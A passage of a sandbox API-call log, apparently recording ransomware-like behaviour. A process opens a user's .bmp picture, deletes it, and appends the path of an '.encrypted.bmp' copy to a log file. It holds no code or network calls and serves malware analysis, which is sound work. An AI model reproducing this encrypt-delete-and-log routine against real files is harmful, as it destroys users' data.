ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x499c4a70, ftLastWriteTime.dwHighDateTime=0x1d5c04a, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x0, dwReserved1=0x777648, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0x7c2240 [0040.851] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0040.851] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.851] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.851] CharLowerBuffW (in: lpsz="byte[97552]", cchLength=0xb | out: lpsz="byte[97552]") returned 0xb [0040.852] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.852] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.852] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.852] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.852] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.852] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.853] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.853] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.853] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.854] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.854] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0040.854] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.855] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\jmlqzshsnywrowx4c3m9.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0040.855] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.856] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.856] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0040.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.856] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.856] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.857] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0040.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.857] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0040.857] FreeLibrary (hLibModule=0x76e10000) returned 1 [0040.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.857] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.858] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFilePart=0x0) returned 0x44 [0040.858] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x180f35a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0x7c2240 [0040.858] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\jmlqzshsnywrowx4c3m9.bmp")) returned 1 [0040.859] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc5ce710, ftCreationTime.dwHighDateTime=0x1d5b8a1, ftLastAccessTime.dwLowDateTime=0x499c4a70, ftLastAccessTime.dwHighDateTime=0x1d5c04a, ftLastWriteTime.dwLowDateTime=0x180f35a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x17d10, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="jmlqzsHsNYwroWx4C3m9.bmp", cAlternateFileName="JMLQZS~1.BMP")) returned 0 [0040.859] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.860] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0040.860] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0040.860] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0040.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0040.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0040.860] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.860] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.861] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0040.861] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0040.861] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0040.861] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.861] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0040.861] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.861] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0040.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0040.861] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0040.861] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x2f1b, lpOverlapped=0x0) returned 1 [0040.862] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0040.862] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x2f1b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0040.862] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0040.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0040.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0040.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.encrypted.bmp\r\n", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0040.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x51) returned 0x794b90 [0040.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.encrypted.bmp\r\n", cchWideChar=81, lpMultiByteStr=0x794b90, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\jmlqzsHsNYwroWx4C3m9.encrypted.bmp\r\n", lpUsedDefaultChar=0x0) returned 81 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0040.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x794b90 | out: hHeap=0x770000) returned 1 [0040.862] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x50, lpOverlapped=0x0) returned 1 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0040.862] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0040.862] CloseHandle (hObject=0x128) returned 1 [0040.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0040.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0040.863] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0040.866] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0040.867] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0040.867] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0040.867] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | 